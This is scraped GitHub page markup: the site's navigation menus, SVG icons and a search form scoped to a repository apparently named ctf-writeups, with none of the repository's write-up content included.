<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="162845937" data-scoped-search-url="/KEERRO/ctf-writeups/search" data-owner-scoped-search-url="/users/KEERRO/search" data-unscoped-search-url="/search" data-turbo="false" action="/KEERRO/ctf-writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="2IbKTfkFnudvcQfuUSjbK8GQs0DC7PuxvyJW+JDnPULrAeYrDHqfu/ZGrmwjFm43Oga0Vw/e/nXVHbChUdd/aA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
